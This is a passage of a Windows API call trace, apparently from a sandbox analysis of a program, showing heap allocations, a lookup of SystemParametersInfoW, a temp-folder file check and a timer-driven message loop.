RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0281.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0281.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0281.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0281.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0281.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0281.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0281.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0281.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0281.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0281.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0281.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0281.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0281.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0281.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0281.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0281.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0281.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0281.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0281.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0281.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.793] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0281.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0281.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0281.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0281.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69988 [0281.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69988, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0281.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0281.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0281.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0281.794] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0281.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0281.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0281.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0281.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0281.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0281.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0281.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0281.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0281.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0281.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0281.795] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0281.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0281.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0281.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0281.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0281.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0281.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0281.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0281.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0281.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0281.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0281.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0281.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0281.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0281.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0281.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0281.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0281.871] FreeLibrary (hLibModule=0x750c0000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0281.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0281.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0281.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0281.872] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0281.872] TranslateMessage (lpMsg=0x8cf708) returned 0 [0281.873] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0281.873] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0281.873] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0281.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0281.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0281.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0281.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0281.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0281.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0281.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0281.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0281.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0281.875] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0281.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0281.875] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0281.875] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0281.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0281.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0281.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0281.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0281.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0281.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0281.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0281.876] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0281.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0281.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0281.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0281.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0281.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0281.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0281.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0281.877] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0281.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0281.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0281.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0281.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0281.877] timeGetTime () returned 0x11869ba [0281.877] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.877] Sleep (dwMilliseconds=0xa) [0281.947] timeGetTime () returned 0x1186a01 [0281.947] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.948] Sleep (dwMilliseconds=0xa) [0282.077] timeGetTime () returned 0x1186a82 [0282.077] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0282.083] Sleep (dwMilliseconds=0xa) [0282.177] timeGetTime () returned 0x1186ae5 [0282.177] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0282.177] Sleep (dwMilliseconds=0xa) [0282.277] timeGetTime () returned 0x1186b4a [0282.277] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0282.277] Sleep (dwMilliseconds=0xa) [0282.582] timeGetTime () returned 0x1186c7b [0282.582] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0282.582] Sleep (dwMilliseconds=0xa) [0282.719] timeGetTime () returned 0x1186d03 [0282.719] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0282.719] TranslateMessage (lpMsg=0x8cf798) returned 0 [0282.720] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0282.720] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0282.720] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0282.720] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0282.720] Sleep (dwMilliseconds=0xa) [0282.804] timeGetTime () returned 0x1186d59 [0282.804] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0282.804] Sleep (dwMilliseconds=0xa) [0282.868] timeGetTime () returned 0x1186d98 [0282.868] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 